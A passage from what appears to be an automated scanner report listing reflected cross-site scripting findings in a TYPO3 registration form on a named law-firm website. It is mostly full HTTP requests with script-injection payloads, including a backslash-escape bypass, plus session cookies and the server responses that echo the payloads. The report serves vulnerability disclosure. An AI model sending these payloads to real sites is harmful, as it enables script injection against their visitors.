   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
il_html]','');
   updateForm('fe_users_form','FE[fe_users][tx_pdmylibrary_news_user]','');
   updateForm('fe_users_form','FE[fe_users][password_again]','3');
   updateForm('fe_users_form','FE[fe_users][0]','13d35\\';alert(1)//8e6a0f23626');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...
4.166. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B1%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B1%5D request parameter is copied into the HTML document as plain text between tags. The payload 79bfb<script>alert(1)</script>bbad2d37fb0 was submitted in the FE%5Bfe_users%5D%5B1%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=079bfb<script>alert(1)</script>bbad2d37fb0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:18 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>');
   updateForm('fe_users_form','FE[fe_users][1]','079bfb<script>alert(1)</script>bbad2d37fb0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...
4.167. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B2%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B2%5D request parameter is copied into the HTML document as plain text between tags. The payload ae940<script>alert(1)</script>a026835ab0d was submitted in the FE%5Bfe_users%5D%5B2%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0ae940<script>alert(1)</script>a026835ab0d&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:31 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0ae940<script>alert(1)</script>a026835ab0d');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users]
...[SNIP]...
4.168. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B3%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B3%5D request parameter is copied into the HTML document as plain text between tags. The payload c8d1b<script>alert(1)</script>d23dadbefc1 was submitted in the FE%5Bfe_users%5D%5B3%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0c8d1b<script>alert(1)</script>d23dadbefc1&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:41 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
</script>');
   updateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0c8d1b<script>alert(1)</script>d23dadbefc1');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users][6]','0');
   /*]]>
...[SNIP]...
4.169. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B4%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B4%5D request parameter is copied into the HTML document as plain text between tags. The payload e512f<script>alert(1)</script>d93c4114a89 was submitted in the FE%5Bfe_users%5D%5B4%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0e512f<script>alert(1)</script>d93c4114a89&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:21:58 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
dateForm('fe_users_form','FE[fe_users][1]','0');
   updateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0e512f<script>alert(1)</script>d93c4114a89');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users][6]','0');
   /*]]>
...[SNIP]...
4.170. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B5%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B5%5D request parameter is copied into the HTML document as plain text between tags. The payload bec11<script>alert(1)</script>fe856d5f00 was submitted in the FE%5Bfe_users%5D%5B5%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0bec11<script>alert(1)</script>fe856d5f00&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:22:14 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27282

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
dateForm('fe_users_form','FE[fe_users][2]','0');
   updateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0bec11<script>alert(1)</script>fe856d5f00');
   updateForm('fe_users_form','FE[fe_users][6]','0');
   /*]]>
...[SNIP]...
4.171. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5B6%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5B6%5D request parameter is copied into the HTML document as plain text between tags. The payload 27942<script>alert(1)</script>05f26062564 was submitted in the FE%5Bfe_users%5D%5B6%5D parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=027942<script>alert(1)</script>05f26062564&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:22:34 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27283

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
dateForm('fe_users_form','FE[fe_users][3]','0');
   updateForm('fe_users_form','FE[fe_users][4]','0');
   updateForm('fe_users_form','FE[fe_users][5]','0');
   updateForm('fe_users_form','FE[fe_users][6]','027942<script>alert(1)</script>05f26062564');
   /*]]>
...[SNIP]...
4.172. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Baddress%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Baddress%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7ef89\'%3balert(1)//3af9dc914c6 was submitted in the FE%5Bfe_users%5D%5Baddress%5D parameter. This input was echoed as 7ef89\\';alert(1)//3af9dc914c6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=37ef89\'%3balert(1)//3af9dc914c6&FE%5Bfe_users%5D%5Bcity%5D=3&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:23:49 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
   PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />

<!--
   This website is powered by TYPO3 - ins
...[SNIP]...
'FE[fe_users][password]','3');
   updateForm('fe_users_form','FE[fe_users][usergroup][]','1');
   updateForm('fe_users_form','FE[fe_users][name]','');
   updateForm('fe_users_form','FE[fe_users][address]','37ef89\\';alert(1)//3af9dc914c6');
   updateForm('fe_users_form','FE[fe_users][telephone]','');
   updateForm('fe_users_form','FE[fe_users][fax]','');
   updateForm('fe_users_form','FE[fe_users][email]','netsparker@example.com');
   updateF
...[SNIP]...
4.173. http://www.phelpsdunbar.com/my-library-log-in/my-library/new-user/srfeuser/create.html [FE%5Bfe_users%5D%5Bcity%5D parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.phelpsdunbar.com
Path:   /my-library-log-in/my-library/new-user/srfeuser/create.html

Issue detail

The value of the FE%5Bfe_users%5D%5Bcity%5D request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21752\'%3balert(1)//21ef1916b41 was submitted in the FE%5Bfe_users%5D%5Bcity%5D parameter. This input was echoed as 21752\\';alert(1)//21ef1916b41 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defence is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Request

GET /my-library-log-in/my-library/new-user/srfeuser/create.html?FE%5Bfe_users%5D%5B0%5D=%27%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00004D)%3C/script%3E&FE%5Bfe_users%5D%5B1%5D=0&FE%5Bfe_users%5D%5B2%5D=0&FE%5Bfe_users%5D%5B3%5D=0&FE%5Bfe_users%5D%5B4%5D=0&FE%5Bfe_users%5D%5B5%5D=0&FE%5Bfe_users%5D%5B6%5D=0&FE%5Bfe_users%5D%5Baddress%5D=3&FE%5Bfe_users%5D%5Bcity%5D=321752\'%3balert(1)//21ef1916b41&FE%5Bfe_users%5D%5Bcompany%5D=3&FE%5Bfe_users%5D%5Bemail%5D=netsparker@example.com&FE%5Bfe_users%5D%5Bgender%5D=0&FE%5Bfe_users%5D%5Bpassword%5D=3&FE%5Bfe_users%5D%5Bpassword_again%5D=3&FE%5Bfe_users%5D%5Bstatic_info_country%5D=AFG&FE%5Bfe_users%5D%5Btitle%5D=3&FE%5Bfe_users%5D%5Busername%5D=Ronald%20Smith&FE%5Bfe_users%5D%5Bzip%5D=3&FE%5Bfe_users%5D%5Bzone%5D=AL&tx_srfeuserregister_pi1%5Bcmd%5D=create&tx_srfeuserregister_pi1%5Bpreview%5D=1&tx_srfeuserregister_pi1%5Bsubmit%5D=Submit HTTP/1.1
Host: www.phelpsdunbar.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=27854845.1302905835.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); fe_typo_user=812d0e9a14; __utma=27854845.703389798.1302905835.1302911975.1302962918.3; __utmc=27854845; __utmb=27854845

Response

HTTP/1.1 200 OK
Date: Sat, 16 Apr 2011 14:24:46 GMT
Server: Apache/1.3.42 Ben-SSL/1.60 (Unix) FrontPage/5.0.2.2624 PHP/4.4.2 mod_perl/1.30
X-Powered-By: PHP/4.4.2
Content-Type: text/html;charset=iso-8859-1
Content-Length: 27264

<!DOCTYPE html
